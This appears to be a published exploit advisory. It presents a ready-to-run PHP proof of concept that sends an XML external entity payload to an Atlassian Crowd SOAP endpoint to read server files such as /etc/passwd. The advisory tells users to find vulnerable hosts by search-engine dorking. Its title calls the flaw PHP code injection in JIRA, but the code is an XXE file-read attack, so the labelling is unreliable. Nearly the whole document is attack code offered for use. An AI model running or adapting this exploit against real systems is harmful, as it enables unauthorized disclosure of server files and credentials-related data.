=============================================================================================================================================
| # Title     : Atlassian JIRA before 5.0.1 PHP Code Injection Vulnerability                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://developer.atlassian.com/                                                                                            |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: An XML SOAP code is generated containing the XXE exploit to read the requested file.
	
	( https://packetstorm.news/files/id/181107/ CVE-2012-2926 )
	
[+] save code as poc.php.

[+] Set Target : line 46

[+] USage : php poc.php 

[+] PayLoad :

<?php

function exploit_xxe($target, $port, $file, $os) {
    $url = "http://$target:$port/crowd/services";
    
    $entity = 'xxetest';
    $payload = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n";
    $payload .= "<!DOCTYPE foo [<!ENTITY $entity SYSTEM \"file://$file\"> ]>\n";
    $payload .= "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n";
    $payload .= "<soapenv:Body>\n";
    $payload .= "<urn:addAllPrincipals xmlns:urn=\"urn:SecurityServer\">\n";
    $payload .= "<urn:in0>\n";
    $payload .= "<aut:name>?</aut:name>\n";
    $payload .= "<aut:token>?</aut:token>\n";
    $payload .= "</urn:in0>\n";
    $payload .= "<urn:in1>\n";
    $payload .= "<soap:SOAPPrincipalWithCredential>\n";
    $payload .= "<soap:passwordCredential>\n";
    $payload .= "<aut:encryptedCredential>?&$entity;</aut:encryptedCredential>\n";
    $payload .= "</soap:passwordCredential>\n";
    $payload .= "</soap:SOAPPrincipalWithCredential>\n";
    $payload .= "</urn:in1>\n";
    $payload .= "</urn:addAllPrincipals>\n";
    $payload .= "</soapenv:Body>\n";
    $payload .= "</soapenv:Envelope>";
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Content-Type: text/xml; charset=UTF-8",
        "SOAPAction: \"\""
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (preg_match('/Invalid boolean value: \?(.*)/m', $response, $matches)) {
        echo "[+] Retrieved file content from $os:\n" . $matches[1] . "\n";
    } else {
        echo "[-] Failed to retrieve file from $os.";
    }
}

$target = "192.168.1.100"; // ضع عنوان IP للخادم المستهدف
$port = 8095;
$file_linux = "/etc/passwd";
$file_windows = "C:\\Windows\\System32\\drivers\\etc\\hosts";

exploit_xxe($target, $port, $file_linux, "Linux");
exploit_xxe($target, $port, $file_windows, "Windows");


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================